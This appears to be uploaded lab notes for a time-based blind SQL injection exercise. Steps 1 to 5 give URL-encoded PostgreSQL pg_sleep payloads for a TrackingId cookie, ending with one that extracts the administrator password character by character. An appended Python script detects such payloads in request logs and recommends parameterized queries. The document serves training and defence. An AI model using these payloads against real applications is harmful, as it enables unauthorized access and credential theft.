Lab Blind SQL injection with time d

The document outlines a lab exercise on blind SQL injection techniques using time delays to retrieve information from a database. It provides step-by-step instructions for verifying conditions related to user existence and password characteristics through crafted SQL queries. Each step demonstrates how to manipulate the application response time to infer data about the 'administrator' user account.

Uploaded by

Jizel Ziadi

Lab: Blind SQL injection with time delays and information retrieval

1/ Verify that the application takes 10 seconds to respond.

TrackingId=x'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--

2/ Verify that the application responds immediately with no time delay. This
demonstrates how you can test a single boolean condition and infer the result.

TrackingId=x'%3BSELECT+CASE+WHEN+(1=2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--

3/ Verify that the condition is true, confirming that there is a user called
administrator.

TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--

4/ This condition should be true, confirming that the password is greater than 1
character in length.

TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--

5/ This uses the SUBSTRING() function to extract a single character from the password,
and test it against a specific value.

TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,1,1)='§a§')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--

// add payload markers around 'a' and around the position 1
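
Seen from the defender's side, the requests in steps 1 to 5 leave a clear trace in request logs: a TrackingId cookie that decodes to SQL containing a delay call, with response times that follow the requested delay. The Python triage below is an added example, not part of the original lab notes; the log record layout, the sample entries and the verdict names are constructed assumptions, and the pattern also covers MySQL's SLEEP() in addition to the pg_sleep() used here.

```python
import re
from urllib.parse import unquote_plus

# Delay primitives: pg_sleep() as in the lab, plus MySQL's SLEEP() (generalization).
DELAY_CALL = re.compile(r"\b(?:pg_sleep|sleep)\s*\(\s*(\d+(?:\.\d+)?)", re.I)
SQL_META = re.compile(r"'|;|--|/\*")
SQL_WORDS = re.compile(r"\b(?:select|case\s+when|substring|length)\b", re.I)

def classify(tracking_id, response_secs):
    """Return (verdict, signals) for one logged request."""
    value = unquote_plus(tracking_id)  # %3B -> ';' and '+' -> ' '
    signals = []
    if SQL_META.search(value):
        signals.append("sql-metachar")
    if SQL_WORDS.search(value):
        signals.append("sql-keyword")
    delays = [float(n) for n in DELAY_CALL.findall(value)]
    if delays:
        signals.append("delay-call")
    if not signals:
        return "clean", signals
    # A response at least as slow as the requested sleep means the database
    # ran the injected statement: the cookie reaches the query unparameterized.
    if max(delays, default=0) > 0 and response_secs >= max(delays):
        return "delay-executed", signals
    return "attempt-no-delay", signals

# Constructed sample records (assumed layout): client, raw cookie value, seconds.
SAMPLE_LOG = [
    ("198.51.100.7", "Zk3PqA91LmXw02Tb", 0.08),
    ("203.0.113.9", "x'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)"
                    "+ELSE+pg_sleep(0)+END--", 10.11),
    ("203.0.113.9", "x'%3BSELECT+CASE+WHEN+(1=2)+THEN+pg_sleep(10)"
                    "+ELSE+pg_sleep(0)+END--", 0.09),
    ("198.51.100.7", "Qm88sleepyHeadA1", 10.4),  # slow but benign request
]

def triage(records):
    """Return (client, verdict) for every request that is not clean."""
    hits = [(client, classify(cookie, secs)[0]) for client, cookie, secs in records]
    return [(client, verdict) for client, verdict in hits if verdict != "clean"]

if __name__ == "__main__":
    for client, verdict in triage(SAMPLE_LOG):
        print(client, verdict)
```

A "delay-executed" verdict is the one to escalate: it shows the cookie value is concatenated into a query, and the fix is a parameterized query for the tracking lookup.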
